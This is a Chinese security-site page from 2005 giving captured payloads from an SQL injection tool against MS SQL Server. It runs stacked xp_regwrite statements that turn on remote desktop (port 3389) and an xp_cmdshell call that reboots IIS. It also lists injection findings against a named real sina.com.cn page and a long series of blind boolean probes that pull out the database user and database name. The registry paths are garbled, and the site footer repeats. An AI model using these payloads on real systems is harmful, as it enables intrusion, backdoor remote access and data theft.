    开启3389：

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'softwaremicrosoftwindowscurrentversionnetcache','enable','reg_sz','0';-
---

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'softwaremicrosoftwindows

ntcurrentversionwinlogon','shutdownwithoutlogon','reg_sz','0';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'softwarepoliciesmicrosoftwindowsinstaller','enableadmintsremote','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'systemcurrentcontrolsetcontrol
terminal

servert','senabled','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'systemcurrentcontrolsetservicestermdd','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'systemcurrentcontrolsetservicestermservice','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite 'hkey_users','.defaultkeyboard

layouttoggle','hotkey','reg_sz','1';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_cmdshell 'iisreset /reboot';----

注入分析：数字型 SQL错误提示关闭开启 access

使用关键字宝石公园“你玩我抽”中奖名单公布

_event_view.asp?event_id=57">http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=57

多句查询支持
子查询   支持
权限   public
当前用户 dbo
当前库   event

;create table t_jiaozhu(jiaozhu varchar(200))

And 1=1
And 1=2
And (Select Count(1) from SYSObjects)>0
and (select len(user))<32
;declare @a int--
And (IS_SRVROLEMEMBER('sysadmin'))=1
And (IS_MEMBER('db_owner'))=1
and (select len(user))<16
and (select len(user))<4
and (select len(user))<2
and (select len(user))<3
and (select len(user))<3
and (select len(user))<4
and (select ascii(substring(user,1,1)))<80
and (select ascii(substring(user,2,1)))<80
and (select ascii(substring(user,3,1)))<80
and (select ascii(substring(user,1,1)))<104
and (select ascii(substring(user,2,1)))<104
and (select ascii(substring(user,3,1)))<104
and (select ascii(substring(user,1,1)))<92
and (select ascii(substring(user,2,1)))<92
and (select ascii(substring(user,3,1)))<116
and (select ascii(substring(user,1,1)))<98
...
...
...

and (select len(db_name()))<16
and (select len(db_name()))<8
and (select len(db_name()))<4
...
...
...

and (select ascii(substring(db_name(),1,1)))<80
and (select ascii(substring(db_name(),2,1)))<80
and (select ascii(substring(db_name(),5,1)))<85

本文地址：http://www.4so.net/web/security/4740.html
将本页加入收藏夹 将地址复制到剪贴板发送给好友 若发现本文有误或版权问题点击这里

hdsi2.0 sql注入部分抓包(3)

hdsi2.0 sql注入部分抓包(1)

热门信息

文章评论收藏本文打印本文关闭窗口

hdsi2.0 sql注入部分抓包(2)

日期：2005-06-07 00:00:00 来源：中国站长学院 请您记住思索网的网址： http://www.4so.net [加入收藏夹]

本文地址：http://www.4so.net/web/security/4740.html 将本页加入收藏夹 将地址复制到剪贴板发送给好友 若发现本文有误或版权问题点击这里

日期：2005-06-07 00:00:00 来源：中国站长学院
请您记住思索网的网址： http://www.4so.net [加入收藏夹]

本文地址：http://www.4so.net/web/security/4740.html
将本页加入收藏夹将地址复制到剪贴板发送给好友若发现本文有误或版权问题点击这里